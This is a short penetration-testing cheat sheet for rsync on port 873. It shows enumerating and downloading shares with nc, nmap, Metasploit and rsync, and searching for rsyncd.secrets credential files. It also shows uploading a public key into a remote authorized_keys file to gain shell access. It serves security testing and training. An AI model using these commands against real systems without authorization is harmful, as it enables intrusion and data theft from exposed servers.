# Pentesting Rsync

## Rsync port 873

* Basic information
* [https://book.hacktricks.xyz/network-services-pentesting/873-pentesting-rsync](https://book.hacktricks.xyz/network-services-pentesting/873-pentesting-rsynchttps://phoenixnap.com/kb/how-to-rsync-over-ssh)
* [https://phoenixnap.com/kb/how-to-rsync-over-ssh](https://book.hacktricks.xyz/network-services-pentesting/873-pentesting-rsynchttps://phoenixnap.com/kb/how-to-rsync-over-ssh)
* rsync is a utility for efficiently transferring and synchronizing files between a computer and an external hard drive and across networked computers by comparing the modification timesand sizes of files.

```
nc -vn 127.0.0.1 873
(UNKNOWN) [127.0.0.1] 873 (rsync) open
@RSYNCD: 31.0        <--- You receive this banner with the version from the server
@RSYNCD: 31.0        <--- Then you send the same info
#list                <--- Then you ask the sever to list
raidroot             <--- The server starts enumerating
USBCopy        	
NAS_Public     	
_NAS_Recycle_TOSRAID	<--- Enumeration finished
@RSYNCD: EXIT         <--- Sever closes the connection


#Now lets try to enumerate "raidroot"
nc -vn 127.0.0.1 873
(UNKNOWN) [127.0.0.1] 873 (rsync) open
@RSYNCD: 31.0
@RSYNCD: 31.0
raidroot
@RSYNCD: AUTHREQD 7H6CqsHCPG06kRiFkKwD8g    <--- This means you need the password
```

* Enumerate shared folders
* An rsync module is essentially a directory share. These modules can optionally be protected by a password.
* This options lists the available modules and, optionally, determines if the module requires a password to access:

```
nmap -sV --script "rsync-list-modules" -p <PORT> <IP>
msf> use auxiliary/scanner/rsync/modules_list

#Example using IPv6 and a different port
rsync -av --list-only rsync://[dead:beef::250:56ff:feb9:e90a]:8730
```

* Manual Rsync
* List a shared folder

```
rsync -av --list-only rsync:/10.10.232.5/shared_name
```

* Copy all files to your local machine via the following command:

```
rsync -av rsync://192.168.0.123:8730/shared_name ./rsyn_shared
```

* If you have credentials you can list/download a shared name using (the password will be prompted):

```
rsync -av --list-only rsync://username@192.168.0.123/shared_name
rsync -av rsync://username@192.168.0.123:8730/shared_name ./rsyn_shared
proxychains rsync -av --list-only rsync://svc_ipmi@172.16.210.34/svc_rsync
```

* You could also upload some content using rsync (for example, in this case we can upload an authorized\_keys file to obtain access to the box):

```
rsync -av home_user/.ssh/ rsync://username@192.168.0.123/home_user/.ssh
#full command syntax below
rsync -av id_rsa.pub rsync://rsync-connect@10.10.63.208/files/sys-internal/.ssh/authorized_keys
```

* Find the rsyncd configuration file:

```
find /etc \( -name rsyncd.conf -o -name rsyncd.secrets \)
```

* Inside the config file sometimes you could find the parameter `secrets file = /path/to/file` and this file could contains usernames and passwords allowed to authenticate to rsyncd.

## Rsync Over SSH

```
rsync -av -e ssh rsync://user@host/share ./local-dir
rsync -av -e "ssh -p2222" rsync://user@host/share ./local-dir
```